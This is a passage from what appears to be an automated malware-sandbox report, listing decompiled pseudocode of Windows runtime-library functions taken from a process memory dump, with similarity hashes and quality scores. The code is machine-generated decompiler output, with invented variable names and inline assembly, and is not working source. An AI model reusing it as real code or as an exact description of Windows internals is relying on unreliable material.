                    									if(_t77 == 0) {
                    										_t64 = 0x7ffe0384;
                    									} else {
                    										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                    									}
                    									__eflags =  *_t64;
                    									if( *_t64 != 0) {
                    										_t64 =  *[fs:0x30];
                    										__eflags = _t64[0x240] & 0x00000004;
                    										if((_t64[0x240] & 0x00000004) != 0) {
                    											_t78 = E01487D50();
                    											__eflags = _t78;
                    											if(_t78 == 0) {
                    												_t64 = 0x7ffe0385;
                    											} else {
                    												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                    											}
                    											__eflags =  *_t64 & 0x00000020;
                    											if(( *_t64 & 0x00000020) != 0) {
                    												_t64 = E014E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                    											}
                    										}
                    									}
                    								}
                    								return _t64;
                    							}
                    						}
                    						_t97 = _t88;
                    						_t93 = _t109;
                    						E014FFDDA(_t97, _v12);
                    						_t105 =  *_t109;
                    						_t67 = _v12 + 1;
                    						_v12 = _t67;
                    						__eflags = _t105 - 0xffffffff;
                    						if(_t105 == 0xffffffff) {
                    							_t106 = 0;
                    							__eflags = 0;
                    						} else {
                    							_t106 =  *(_t105 + 0x14);
                    						}
                    						__eflags = _t67 - 2;
                    						if(_t67 > 2) {
                    							__eflags = _t109 - 0x1555350;
                    							if(_t109 != 0x1555350) {
                    								__eflags = _t106 - _v20;
                    								if(__eflags == 0) {
                    									_t93 = _t109;
                    									E014FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                    								}
                    							}
                    						}
                    						_push("RTL: Re-Waiting\n");
                    						_push(0);
                    						_push(0x65);
                    						_v20 = _t106;
                    						E014F5720();
                    						_t104 = _v28;
                    						_t116 = _t116 + 0xc;
                    						continue;
                    					}
                    				}
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: RTL: Re-Waiting
                    • API String ID: 0-316354757
                    • Opcode ID: 94c6a58ed26303d6d3d28afe7c67856932cc6b655a6d14fe98375b930df20bbb
                    • Instruction ID: 2c563eafb627272191e45168f07fbdaa16c5d31be4476c9919642277bd8e885b
                    • Opcode Fuzzy Hash: 94c6a58ed26303d6d3d28afe7c67856932cc6b655a6d14fe98375b930df20bbb
                    • Instruction Fuzzy Hash: 9E614671A00605ABDB22DF6CCC90BBF7BE9EB54328F14066BD915973F1C770990687A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E01530EA5(void* __ecx, void* __edx) {
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				unsigned int _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				char _v44;
                    				intOrPtr _v64;
                    				void* __ebx;
                    				void* __edi;
                    				signed int _t58;
                    				unsigned int _t60;
                    				intOrPtr _t62;
                    				char* _t67;
                    				char* _t69;
                    				void* _t80;
                    				void* _t83;
                    				intOrPtr _t93;
                    				intOrPtr _t115;
                    				char _t117;
                    				void* _t120;
                    
                    				_t83 = __edx;
                    				_t117 = 0;
                    				_t120 = __ecx;
                    				_v44 = 0;
                    				if(E0152FF69(__ecx,  &_v44,  &_v32) < 0) {
                    					L24:
                    					_t109 = _v44;
                    					if(_v44 != 0) {
                    						E01531074(_t83, _t120, _t109, _t117, _t117);
                    					}
                    					L26:
                    					return _t117;
                    				}
                    				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                    				_t5 = _t83 + 1; // 0x1
                    				_v36 = _t5 << 0xc;
                    				_v40 = _t93;
                    				_t58 =  *(_t93 + 0xc) & 0x40000000;
                    				asm("sbb ebx, ebx");
                    				_t83 = ( ~_t58 & 0x0000003c) + 4;
                    				if(_t58 != 0) {
                    					_push(0);
                    					_push(0x14);
                    					_push( &_v24);
                    					_push(3);
                    					_push(_t93);
                    					_push(0xffffffff);
                    					_t80 = E014A9730();
                    					_t115 = _v64;
                    					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                    						_push(_t93);
                    						E0152A80D(_t115, 1, _v20, _t117);
                    						_t83 = 4;
                    					}
                    				}
                    				if(E0152A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                    					goto L24;
                    				}
                    				_t60 = _v32;
                    				_t97 = (_t60 != 0x100000) + 1;
                    				_t83 = (_v44 -  *0x1558b04 >> 0x14) + (_v44 -  *0x1558b04 >> 0x14);
                    				_v28 = (_t60 != 0x100000) + 1;
                    				_t62 = _t83 + (_t60 >> 0x14) * 2;
                    				_v40 = _t62;
                    				if(_t83 >= _t62) {
                    					L10:
                    					asm("lock xadd [eax], ecx");
                    					asm("lock xadd [eax], ecx");
                    					if(E01487D50() == 0) {
                    						_t67 = 0x7ffe0380;
                    					} else {
                    						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    					}
                    					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    						E0152138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                    					}
                    					if(E01487D50() == 0) {
                    						_t69 = 0x7ffe0388;
                    					} else {
                    						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    					}
                    					if( *_t69 != 0) {
                    						E0151FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                    					}
                    					if(( *0x1558724 & 0x00000008) != 0) {
                    						E015252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                    					}
                    					_t117 = _v44;
                    					goto L26;
                    				}
                    				while(E015315B5(0x1558ae4, _t83, _t97, _t97) >= 0) {
                    					_t97 = _v28;
                    					_t83 = _t83 + 2;
                    					if(_t83 < _v40) {
                    						continue;
                    					}
                    					goto L10;
                    				}
                    				goto L24;
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 4e4d9ff950edd69c178b4fc072b671b15e855fb6c1f222bdb346ab1aa275d812
                    • Instruction ID: 4db57b108e9fe07f1f5b236856f4180133dcb587a912d10b6ae5267aff7049c8
                    • Opcode Fuzzy Hash: 4e4d9ff950edd69c178b4fc072b671b15e855fb6c1f222bdb346ab1aa275d812
                    • Instruction Fuzzy Hash: C4518E713047429FD325DF29D8C4B1BBBE5FBC4614F04092DFA969B290D671E805CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0149F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				char* _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				char _v36;
                    				char _v44;
                    				char _v52;
                    				intOrPtr _v56;
                    				char _v60;
                    				intOrPtr _v72;
                    				void* _t51;
                    				void* _t58;
                    				signed short _t82;
                    				short _t84;
                    				signed int _t91;
                    				signed int _t100;
                    				signed short* _t103;
                    				void* _t108;
                    				intOrPtr* _t109;
                    
                    				_t103 = __ecx;
                    				_t82 = __edx;
                    				_t51 = E01484120(0, __ecx, 0,  &_v52, 0, 0, 0);
                    				if(_t51 >= 0) {
                    					_push(0x21);
                    					_push(3);
                    					_v56 =  *0x7ffe02dc;
                    					_v20 =  &_v52;
                    					_push( &_v44);
                    					_v28 = 0x18;
                    					_push( &_v28);
                    					_push(0x100020);
                    					_v24 = 0;
                    					_push( &_v60);
                    					_v16 = 0x40;
                    					_v12 = 0;
                    					_v8 = 0;
                    					_t58 = E014A9830();
                    					_t87 =  *[fs:0x30];
                    					_t108 = _t58;
                    					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                    					if(_t108 < 0) {
                    						L11:
                    						_t51 = _t108;
                    					} else {
                    						_push(4);
                    						_push(8);
                    						_push( &_v36);
                    						_push( &_v44);
                    						_push(_v60);
                    						_t108 = E014A9990();
                    						if(_t108 < 0) {
                    							L10:
                    							_push(_v60);
                    							E014A95D0();
                    							goto L11;
                    						} else {
                    							_t109 = L01484620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                    							if(_t109 == 0) {
                    								_t108 = 0xc0000017;
                    								goto L10;
                    							} else {
                    								_t21 = _t109 + 0x18; // 0x18
                    								 *((intOrPtr*)(_t109 + 4)) = _v60;
                    								 *_t109 = 1;
                    								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                    								 *(_t109 + 0xe) = _t82;
                    								 *((intOrPtr*)(_t109 + 8)) = _v56;
                    								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                    								E014AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                    								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                    								 *((short*)(_t109 + 0xc)) =  *_t103;
                    								_t91 =  *_t103 & 0x0000ffff;
                    								_t100 = _t91 & 0xfffffffe;
                    								_t84 = 0x5c;
                    								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                    									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                    										_push(_v60);
                    										E014A95D0();
                    										L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                    										_t51 = 0xc0000106;
                    									} else {
                    										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                    										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                    										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                    										goto L5;
                    									}
                    								} else {
                    									L5:
                    									 *_a4 = _t109;
                    									_t51 = 0;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _t51;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction ID: 1d24200f52763dce45b0a11cfb85dbbb2c41d7c7985e61f8f7c28134f930a6ff
                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction Fuzzy Hash: B9518A71604711AFC320DF29C841A6BBBF8FF58714F01892EFA95976A0E7B4E904CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E014E3540(intOrPtr _a4) {
                    				signed int _v12;
                    				intOrPtr _v88;
                    				intOrPtr _v92;
                    				char _v96;
                    				char _v352;
                    				char _v1072;
                    				intOrPtr _v1140;
                    				intOrPtr _v1148;
                    				char _v1152;
                    				char _v1156;
                    				char _v1160;
                    				char _v1164;
                    				char _v1168;
                    				char* _v1172;
                    				short _v1174;
                    				char _v1176;
                    				char _v1180;
                    				char _v1192;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				short _t41;
                    				short _t42;
                    				intOrPtr _t80;
                    				intOrPtr _t81;
                    				signed int _t82;
                    				void* _t83;
                    
                    				_v12 =  *0x155d360 ^ _t82;
                    				_t41 = 0x14;
                    				_v1176 = _t41;
                    				_t42 = 0x16;
                    				_v1174 = _t42;
                    				_v1164 = 0x100;
                    				_v1172 = L"BinaryHash";
                    				_t81 = E014A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                    				if(_t81 < 0) {
                    					L11:
                    					_t75 = _t81;
                    					E014E3706(0, _t81, _t79, _t80);
                    					L12:
                    					if(_a4 != 0xc000047f) {
                    						E014AFA60( &_v1152, 0, 0x50);
                    						_v1152 = 0x60c201e;
                    						_v1148 = 1;
                    						_v1140 = E014E3540;
                    						E014AFA60( &_v1072, 0, 0x2cc);
                    						_push( &_v1072);
                    						E014BDDD0( &_v1072, _t75, _t79, _t80, _t81);
                    						E014F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                    						_push(_v1152);
                    						_push(0xffffffff);
                    						E014A97C0();
                    					}
                    					return E014AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                    				}
                    				_t79 =  &_v352;
                    				_t81 = E014E3971(0, _a4,  &_v352,  &_v1156);
                    				if(_t81 < 0) {
                    					goto L11;
                    				}
                    				_t75 = _v1156;
                    				_t79 =  &_v1160;
                    				_t81 = E014E3884(_v1156,  &_v1160,  &_v1168);
                    				if(_t81 >= 0) {
                    					_t80 = _v1160;
                    					E014AFA60( &_v96, 0, 0x50);
                    					_t83 = _t83 + 0xc;
                    					_push( &_v1180);
                    					_push(0x50);
                    					_push( &_v96);
                    					_push(2);
                    					_push( &_v1176);
                    					_push(_v1156);
                    					_t81 = E014A9650();
                    					if(_t81 >= 0) {
                    						if(_v92 != 3 || _v88 == 0) {
                    							_t81 = 0xc000090b;
                    						}
                    						if(_t81 >= 0) {
                    							_t75 = _a4;
                    							_t79 =  &_v352;
                    							E014E3787(_a4,  &_v352, _t80);
                    						}
                    					}
                    					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                    				}
                    				_push(_v1156);
                    				E014A95D0();
                    				if(_t81 >= 0) {
                    					goto L12;
                    				} else {
                    					goto L11;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: e2acda03801bfba42139c9636916db6eaf0157f4cba8817d2fa5d132a1c810d9
                    • Instruction ID: 77ba1fea1e1d588443ced3c4be67b61f4158ac5d52ccf71f11a11c19d04cf09f
                    • Opcode Fuzzy Hash: e2acda03801bfba42139c9636916db6eaf0157f4cba8817d2fa5d132a1c810d9
                    • Instruction Fuzzy Hash: 934167B1D0052D9BDB21DF61CC84FDEB77CAB54714F4145AAE609AB250DB309E88CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E015305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                    				signed int _v20;
                    				char _v24;
                    				signed int _v28;
                    				char _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				void* __ebx;
                    				void* _t35;
                    				signed int _t42;
                    				char* _t48;
                    				signed int _t59;
                    				signed char _t61;
                    				signed int* _t79;
                    				void* _t88;
                    
                    				_v28 = __edx;
                    				_t79 = __ecx;
                    				if(E015307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                    					L13:
                    					_t35 = 0;
                    					L14:
                    					return _t35;
                    				}
                    				_t61 = __ecx[1];
                    				_t59 = __ecx[0xf];
                    				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                    				_v36 = _a8 << 0xc;
                    				_t42 =  *(_t59 + 0xc) & 0x40000000;
                    				asm("sbb esi, esi");
                    				_t88 = ( ~_t42 & 0x0000003c) + 4;
                    				if(_t42 != 0) {
                    					_push(0);
                    					_push(0x14);
                    					_push( &_v24);
                    					_push(3);
                    					_push(_t59);
                    					_push(0xffffffff);
                    					if(E014A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                    						_push(_t61);
                    						E0152A80D(_t59, 1, _v20, 0);
                    						_t88 = 4;
                    					}
                    				}
                    				_t35 = E0152A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                    				if(_t35 < 0) {
                    					goto L14;
                    				}
                    				E01531293(_t79, _v40, E015307DF(_t79, _v28,  &_a4,  &_a8, 1));
                    				if(E01487D50() == 0) {
                    					_t48 = 0x7ffe0380;
                    				} else {
                    					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    				}
                    				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    					E0152138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                    				}
                    				goto L13;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction ID: d08e6aa297c3433f0e0a2be012dc84a3bf1a2abdc47b3fd6b33492e2faf556c5
                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction Fuzzy Hash: 2531F132204716ABE720DE29CC84F9B7BD9BBC4754F144229FA589F2C4D670E915CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E014E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr* _v16;
                    				char* _v20;
                    				short _v22;
                    				char _v24;
                    				intOrPtr _t38;
                    				short _t40;
                    				short _t41;
                    				void* _t44;
                    				intOrPtr _t47;
                    				void* _t48;
                    
                    				_v16 = __edx;
                    				_t40 = 0x14;
                    				_v24 = _t40;
                    				_t41 = 0x16;
                    				_v22 = _t41;
                    				_t38 = 0;
                    				_v12 = __ecx;
                    				_push( &_v8);
                    				_push(0);
                    				_push(0);
                    				_push(2);
                    				_t43 =  &_v24;
                    				_v20 = L"BinaryName";
                    				_push( &_v24);
                    				_push(__ecx);
                    				_t47 = 0;
                    				_t48 = E014A9650();
                    				if(_t48 >= 0) {
                    					_t48 = 0xc000090b;
                    				}
                    				if(_t48 != 0xc0000023) {
                    					_t44 = 0;
                    					L13:
                    					if(_t48 < 0) {
                    						L16:
                    						if(_t47 != 0) {
                    							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                    						}
                    						L18:
                    						return _t48;
                    					}
                    					 *_v16 = _t38;
                    					 *_a4 = _t47;
                    					goto L18;
                    				}
                    				_t47 = L01484620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                    				if(_t47 != 0) {
                    					_push( &_v8);
                    					_push(_v8);
                    					_push(_t47);
                    					_push(2);
                    					_push( &_v24);
                    					_push(_v12);
                    					_t48 = E014A9650();
                    					if(_t48 < 0) {
                    						_t44 = 0;
                    						goto L16;
                    					}
                    					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                    						_t48 = 0xc000090b;
                    					}
                    					_t44 = 0;
                    					if(_t48 < 0) {
                    						goto L16;
                    					} else {
                    						_t17 = _t47 + 0xc; // 0xc
                    						_t38 = _t17;
                    						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                    							_t48 = 0xc000090b;
                    						}
                    						goto L13;
                    					}
                    				}
                    				_t48 = _t48 + 0xfffffff4;
                    				goto L18;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: 382ea2167c85cb85558a33aa5d9f70abe10c061aefbabb4f8136f739b77c5462
                    • Instruction ID: 22c72f53df90d420611d81dc4cc465da7b3debc1064cf012ba0031ffb89ec200
                    • Opcode Fuzzy Hash: 382ea2167c85cb85558a33aa5d9f70abe10c061aefbabb4f8136f739b77c5462
                    • Instruction Fuzzy Hash: 2331C272D0151AAFEB16DE59C949E6FBBB4FB90B21F02416AE914A7360D7309E00C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 33%
                    			E0149D294(void* __ecx, char __edx, void* __eflags) {
                    				signed int _v8;
                    				char _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				intOrPtr _v64;
                    				char* _v68;
                    				intOrPtr _v72;
                    				char _v76;
                    				signed int _v84;
                    				intOrPtr _v88;
                    				char _v92;
                    				intOrPtr _v96;
                    				intOrPtr _v100;
                    				char _v104;
                    				char _v105;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t35;
                    				char _t38;
                    				signed int _t40;
                    				signed int _t44;
                    				signed int _t52;
                    				void* _t53;
                    				void* _t55;
                    				void* _t61;
                    				intOrPtr _t62;
                    				void* _t64;
                    				signed int _t65;
                    				signed int _t66;
                    
                    				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                    				_v8 =  *0x155d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                    				_v105 = __edx;
                    				_push( &_v92);
                    				_t52 = 0;
                    				_push(0);
                    				_push(0);
                    				_push( &_v104);
                    				_push(0);
                    				_t59 = __ecx;
                    				_t55 = 2;
                    				if(E01484120(_t55, __ecx) < 0) {
                    					_t35 = 0;
                    					L8:
                    					_pop(_t61);
                    					_pop(_t64);
                    					_pop(_t53);
                    					return E014AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                    				}
                    				_v96 = _v100;
                    				_t38 = _v92;
                    				if(_t38 != 0) {
                    					_v104 = _t38;
                    					_v100 = _v88;
                    					_t40 = _v84;
                    				} else {
                    					_t40 = 0;
                    				}
                    				_v72 = _t40;
                    				_v68 =  &_v104;
                    				_push( &_v52);
                    				_v76 = 0x18;
                    				_push( &_v76);
                    				_v64 = 0x40;
                    				_v60 = _t52;
                    				_v56 = _t52;
                    				_t44 = E014A98D0();
                    				_t62 = _v88;
                    				_t65 = _t44;
                    				if(_t62 != 0) {
                    					asm("lock xadd [edi], eax");
                    					if((_t44 | 0xffffffff) != 0) {
                    						goto L4;
                    					}
                    					_push( *((intOrPtr*)(_t62 + 4)));
                    					E014A95D0();
                    					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                    					goto L4;
                    				} else {
                    					L4:
                    					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                    					if(_t65 >= 0) {
                    						_t52 = 1;
                    					} else {
                    						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                    							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                    						}
                    					}
                    					_t35 = _t52;
                    					goto L8;
                    				}
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: d1ace80742fc734966ebcc0529fa005927c937338300c49c205eb4a3932664f3
                    • Instruction ID: 77f4baac39075afe97c4dedc9748065349d2451ec0e0a53258b7b04ca88bdf94
                    • Opcode Fuzzy Hash: d1ace80742fc734966ebcc0529fa005927c937338300c49c205eb4a3932664f3
                    • Instruction Fuzzy Hash: C931A2B29083059FCB21DF69C98096FBFE8EB95654F45092FF99483260D634DD05CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E01471B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr* _t26;
                    				intOrPtr _t29;
                    				void* _t30;
                    				signed int _t31;
                    
                    				_t27 = __ecx;
                    				_t29 = __edx;
                    				_t31 = 0;
                    				_v8 = __edx;
                    				if(__edx == 0) {
                    					L18:
                    					_t30 = 0xc000000d;
                    					goto L12;
                    				} else {
                    					_t26 = _a4;
                    					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                    						goto L18;
                    					} else {
                    						E014ABB40(__ecx,  &_v16, __ecx);
                    						_push(_t26);
                    						_push(0);
                    						_push(0);
                    						_push(_t29);
                    						_push( &_v16);
                    						_t30 = E014AA9B0();
                    						if(_t30 >= 0) {
                    							_t19 =  *_t26;
                    							if( *_t26 != 0) {
                    								goto L7;
                    							} else {
                    								 *_a8 =  *_a8 & 0;
                    							}
                    						} else {
                    							if(_t30 != 0xc0000023) {
                    								L9:
                    								_push(_t26);
                    								_push( *_t26);
                    								_push(_t31);
                    								_push(_v8);
                    								_push( &_v16);
                    								_t30 = E014AA9B0();
                    								if(_t30 < 0) {
                    									L12:
                    									if(_t31 != 0) {
                    										L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                    									}
                    								} else {
                    									 *_a8 = _t31;
                    								}
                    							} else {
                    								_t19 =  *_t26;
                    								if( *_t26 == 0) {
                    									_t31 = 0;
                    								} else {
                    									L7:
                    									_t31 = L01484620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                    								}
                    								if(_t31 == 0) {
                    									_t30 = 0xc0000017;
                    								} else {
                    									goto L9;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _t30;
                    			}










                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: WindowsExcludedProcs
                    • API String ID: 0-3583428290
                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction ID: 966b5ec64fa0832f98801c3966055848c5d3c875fb0ae263680f67ab98029509
                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction Fuzzy Hash: C221FB7E500115AFDB219E9AC940F9B7B6DEF50E51F16442BFE049B320D630DD01D7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0148F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                    				intOrPtr _t13;
                    				intOrPtr _t14;
                    				signed int _t16;
                    				signed char _t17;
                    				intOrPtr _t19;
                    				intOrPtr _t21;
                    				intOrPtr _t23;
                    				intOrPtr* _t25;
                    
                    				_t25 = _a8;
                    				_t17 = __ecx;
                    				if(_t25 == 0) {
                    					_t19 = 0xc00000f2;
                    					L8:
                    					return _t19;
                    				}
                    				if((__ecx & 0xfffffffe) != 0) {
                    					_t19 = 0xc00000ef;
                    					goto L8;
                    				}
                    				_t19 = 0;
                    				 *_t25 = 0;
                    				_t21 = 0;
                    				_t23 = "Actx ";
                    				if(__edx != 0) {
                    					if(__edx == 0xfffffffc) {
                    						L21:
                    						_t21 = 0x200;
                    						L5:
                    						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                    						 *_t25 = _t13;
                    						L6:
                    						if(_t13 == 0) {
                    							if((_t17 & 0x00000001) != 0) {
                    								 *_t25 = _t23;
                    							}
                    						}
                    						L7:
                    						goto L8;
                    					}
                    					if(__edx == 0xfffffffd) {
                    						 *_t25 = _t23;
                    						_t13 = _t23;
                    						goto L6;
                    					}
                    					_t13 =  *((intOrPtr*)(__edx + 0x10));
                    					 *_t25 = _t13;
                    					L14:
                    					if(_t21 == 0) {
                    						goto L6;
                    					}
                    					goto L5;
                    				}
                    				_t14 = _a4;
                    				if(_t14 != 0) {
                    					_t16 =  *(_t14 + 0x14) & 0x00000007;
                    					if(_t16 <= 1) {
                    						_t21 = 0x1f8;
                    						_t13 = 0;
                    						goto L14;
                    					}
                    					if(_t16 == 2) {
                    						goto L21;
                    					}
                    					if(_t16 != 4) {
                    						_t19 = 0xc00000f0;
                    						goto L7;
                    					}
                    					_t13 = 0;
                    					goto L6;
                    				} else {
                    					_t21 = 0x1f8;
                    					goto L5;
                    				}
                    			}












                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Actx
                    • API String ID: 0-89312691
                    • Opcode ID: 9b646f75e5414476b6fe1b7a6890b2deb95250b59e7c424fa517def25e2b48f9
                    • Instruction ID: 6f7136dd804cd52cf6cbbc58b41d96bb5ea133c1bc76f4139bc3b6c4f2f8eb73
                    • Opcode Fuzzy Hash: 9b646f75e5414476b6fe1b7a6890b2deb95250b59e7c424fa517def25e2b48f9
                    • Instruction Fuzzy Hash: CE11C4397047028BFB257E1D889073F7695EB86624F25463BE561CB3B1DB74D84A8340
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E01518DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t35;
                    				void* _t41;
                    
                    				_t40 = __esi;
                    				_t39 = __edi;
                    				_t38 = __edx;
                    				_t35 = __ecx;
                    				_t34 = __ebx;
                    				_push(0x74);
                    				_push(0x1540d50);
                    				E014BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                    				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                    				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                    					E014F5720(0x65, 0, "Critical error detected %lx\n", _t35);
